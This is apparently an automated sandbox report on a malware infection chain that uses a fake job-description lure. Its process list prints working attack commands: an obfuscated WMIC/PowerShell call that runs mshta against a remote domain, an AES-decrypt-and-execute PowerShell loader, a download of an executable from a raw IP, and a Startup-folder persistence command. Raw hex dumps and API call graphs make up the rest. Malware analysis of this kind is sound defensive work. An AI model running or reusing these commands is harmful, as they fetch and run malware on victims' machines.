c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                                                        Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                                                        Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                                                        Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:02:39:11
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')"
                                                                                                        Imagebase:0x7ff61dab0000
                                                                                                        File size:576'000 bytes
                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:1
                                                                                                        Start time:02:39:11
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:02:39:12
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:02:39:12
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:02:39:14
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325"
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:02:39:15
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325
                                                                                                        Imagebase:0x7ff7a8720000
                                                                                                        File size:14'848 bytes
                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        Target ID:8
                                                                                                        Start time:02:39:18
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                        Imagebase:0x7ff7403e0000
                                                                                                        File size:55'320 bytes
                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:9
                                                                                                        Start time:02:39:19
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6)
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:02:39:19
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:16
                                                                                                        Start time:02:39:29
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
                                                                                                        Imagebase:0x7ff651090000
                                                                                                        File size:5'641'176 bytes
                                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:17
                                                                                                        Start time:02:39:30
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                        Imagebase:0x7ff70df30000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:18
                                                                                                        Start time:02:39:30
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1596,i,13836792171696391892,6566973636645197800,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                        Imagebase:0x7ff70df30000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:19
                                                                                                        Start time:02:39:34
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Users\user\AppData\Roaming\dqcwif.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\dqcwif.exe"
                                                                                                        Imagebase:0x7ff6b5b20000
                                                                                                        File size:1'083'904 bytes
                                                                                                        MD5 hash:302EA0EBB32FF34A46D6B6DF1E66F9FE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 65%, ReversingLabs
                                                                                                        Has exited:true

                                                                                                        Target ID:20
                                                                                                        Start time:02:39:36
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:21
                                                                                                        Start time:02:39:36
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:24
                                                                                                        Start time:02:39:41
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:25
                                                                                                        Start time:02:39:41
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:28
                                                                                                        Start time:02:39:46
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Users\Public\Guard.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                        Imagebase:0x5f0000
                                                                                                        File size:893'608 bytes
                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 8%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        Target ID:29
                                                                                                        Start time:02:39:48
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                        Imagebase:0x1c0000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:30
                                                                                                        Start time:02:39:48
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:32
                                                                                                        Start time:02:40:01
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                        Imagebase:0x7ff62a600000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:33
                                                                                                        Start time:02:40:02
                                                                                                        Start date:23/12/2024
                                                                                                        Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:893'608 bytes
                                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 8%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        Reset < >
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2178589682.00007FFD33BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33BA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_7ffd33ba0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction ID: 9e086fb12fc34716112ba11b3ef7de698281f734bc9ae5e8130aada8407e8a70
                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction Fuzzy Hash: 5501677121CB0C4FD748EF0CE451AA5B7E0FB99364F10056DE58EC3651DA36E882CB46

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:2.5%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:11.5%
                                                                                                          Total number of Nodes:1472
                                                                                                          Total number of Limit Nodes:43
                                                                                                          execution_graph 93420 7ff6b5b32bf8 93423 7ff6b5b2ed44 93420->93423 93422 7ff6b5b32c05 93424 7ff6b5b2ed75 93423->93424 93426 7ff6b5b2edcd 93423->93426 93424->93426 93432 7ff6b5b33c20 93424->93432 93430 7ff6b5b2edfe 93426->93430 93454 7ff6b5ba34e4 77 API calls 3 library calls 93426->93454 93428 7ff6b5b7a636 93429 7ff6b5b2eda8 93429->93430 93453 7ff6b5b2ee20 5 API calls Concurrency::wait 93429->93453 93430->93422 93440 7ff6b5b33c80 93432->93440 93433 7ff6b5b450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 93433->93440 93434 7ff6b5b805be 93461 7ff6b5ba34e4 77 API calls 3 library calls 93434->93461 93436 7ff6b5b805d1 93436->93429 93437 7ff6b5b34a8f 93441 7ff6b5b34aa9 93437->93441 93443 7ff6b5b7fefe 93437->93443 93448 7ff6b5b34ac0 93437->93448 93439 7ff6b5b34fe7 93444 7ff6b5b2e0a8 4 API calls 93439->93444 93440->93433 93440->93434 93440->93437 93440->93439 93440->93441 93447 7ff6b5b33dde 93440->93447 93450 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93440->93450 93451 7ff6b5b44f0c 34 API calls __scrt_initialize_thread_safe_statics 93440->93451 93452 7ff6b5b29640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93440->93452 93455 7ff6b5b35360 300 API calls Concurrency::wait 93440->93455 93456 7ff6b5b2e0a8 93440->93456 93460 7ff6b5ba34e4 77 API calls 3 library calls 93440->93460 93442 7ff6b5b2e0a8 4 API calls 93441->93442 93441->93448 93442->93447 93446 7ff6b5b2e0a8 4 API calls 93443->93446 93444->93447 93446->93448 93447->93429 93448->93429 93450->93440 93451->93440 93452->93440 93453->93426 93454->93428 93455->93440 93457 7ff6b5b2e0b6 93456->93457 93458 7ff6b5b2e0bb 93456->93458 93462 7ff6b5b2f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93457->93462 93458->93440 93460->93440 93461->93436 93462->93458 93463 7ff6b5b5c51c 93464 7ff6b5b5c567 93463->93464 93468 7ff6b5b5c52b _invalid_parameter_noinfo 93463->93468 93471 7ff6b5b555d4 15 API calls _invalid_parameter_noinfo 93464->93471 93465 7ff6b5b5c54e HeapAlloc 93467 7ff6b5b5c565 93465->93467 93465->93468 93468->93464 93468->93465 93470 7ff6b5b4925c EnterCriticalSection LeaveCriticalSection _invalid_parameter_noinfo 93468->93470 93470->93468 93471->93467 93472 7ff6b5b32c17 93475 7ff6b5b314a0 93472->93475 93474 7ff6b5b32c2a 93476 7ff6b5b314d3 93475->93476 93479 7ff6b5b7bdd1 93476->93479 93481 7ff6b5b7bdf2 93476->93481 93488 7ff6b5b7be31 93476->93488 93507 7ff6b5b314fa __scrt_fastfail 93476->93507 93480 7ff6b5b7bddb 93479->93480 93479->93507 93520 7ff6b5bb9514 300 API calls 93480->93520 93491 7ff6b5b7be19 93481->93491 93521 7ff6b5bb9a88 300 API calls 4 library calls 93481->93521 93482 7ff6b5b31884 93511 7ff6b5b42130 45 API calls 93482->93511 93523 7ff6b5bb8f48 300 API calls 3 library calls 93488->93523 93490 7ff6b5b31898 93490->93474 93522 7ff6b5ba34e4 77 API calls 3 library calls 93491->93522 93496 7ff6b5b31a30 45 API calls 93496->93507 93499 7ff6b5b42130 45 API calls 93499->93507 93500 7ff6b5b31799 93509 7ff6b5b31815 93500->93509 93527 7ff6b5ba34e4 77 API calls 3 library calls 93500->93527 93501 7ff6b5b7bfe4 93526 7ff6b5bb93a4 77 API calls 93501->93526 93502 7ff6b5b33c20 300 API calls 93502->93507 93505 7ff6b5b2e0a8 4 API calls 93505->93507 93507->93482 93507->93496 93507->93499 93507->93500 93507->93501 93507->93502 93507->93505 93507->93509 93510 7ff6b5b2ef9c 46 API calls 93507->93510 93512 7ff6b5b420d0 45 API calls 93507->93512 93513 7ff6b5b25af8 300 API calls 93507->93513 93514 7ff6b5b45114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93507->93514 93515 7ff6b5b435c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93507->93515 93516 7ff6b5b44f0c 34 API calls _onexit 93507->93516 93517 7ff6b5b450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93507->93517 93518 7ff6b5b436c4 77 API calls 93507->93518 93519 7ff6b5b437dc 300 API calls 93507->93519 93524 7ff6b5b2ee20 5 API calls Concurrency::wait 93507->93524 93525 7ff6b5b8ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93507->93525 93509->93474 93510->93507 93511->93490 93512->93507 93513->93507 93515->93507 93516->93507 93518->93507 93519->93507 93520->93509 93521->93491 93522->93488 93523->93507 93524->93507 93525->93507 93526->93500 93527->93500 93528 7ff6b5b3447b 93533 7ff6b5b358d0 93528->93533 93530 7ff6b5b3448a 93554 7ff6b5ba34e4 77 API calls 3 library calls 93530->93554 93532 7ff6b5b80550 93534 7ff6b5b358fc 93533->93534 93535 7ff6b5b35976 93533->93535 93534->93535 93536 7ff6b5b3596d 93534->93536 93537 7ff6b5b3622b 93534->93537 93545 7ff6b5b35990 93534->93545 93541 7ff6b5b35bd6 93535->93541 93535->93545 93548 7ff6b5b2fd6c 36 API calls 93535->93548 93551 7ff6b5b41ad0 CompareStringW 93535->93551 93552 7ff6b5b81aca 93535->93552 93553 7ff6b5b2d4cc 48 API calls 93535->93553 93536->93535 93539 7ff6b5b36355 93536->93539 93536->93541 93536->93545 93537->93545 93560 7ff6b5b3e65c 36 API calls 93537->93560 93539->93541 93543 7ff6b5b36367 93539->93543 93541->93545 93559 7ff6b5b2fd6c 36 API calls 93541->93559 93542 7ff6b5b81af3 93558 7ff6b5b2fd6c 36 API calls 93542->93558 93555 7ff6b5b2ef68 36 API calls 93543->93555 93545->93530 93548->93535 93549 7ff6b5b3636f 93556 7ff6b5b3e65c 36 API calls 93549->93556 93551->93535 93552->93545 93557 7ff6b5b2fd6c 36 API calls 93552->93557 93553->93535 93554->93532 93555->93549 93556->93545 93557->93542 93558->93545 93559->93545 93560->93545 93561 7ff6b5b347e1 93562 7ff6b5b34d57 93561->93562 93566 7ff6b5b347f2 93561->93566 93626 7ff6b5b2ee20 5 API calls Concurrency::wait 93562->93626 93564 7ff6b5b34d66 93627 7ff6b5b2ee20 5 API calls Concurrency::wait 93564->93627 93566->93564 93567 7ff6b5b34df3 93566->93567 93568 7ff6b5b34862 93566->93568 93628 7ff6b5ba0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93567->93628 93589 7ff6b5b33c80 93568->93589 93591 7ff6b5b366c0 93568->93591 93571 7ff6b5b33dde 93572 7ff6b5b805be 93630 7ff6b5ba34e4 77 API calls 3 library calls 93572->93630 93574 7ff6b5b805d1 93575 7ff6b5b34aa9 93578 7ff6b5b34ac0 93575->93578 93580 7ff6b5b2e0a8 4 API calls 93575->93580 93576 7ff6b5b34a8f 93576->93575 93576->93578 93581 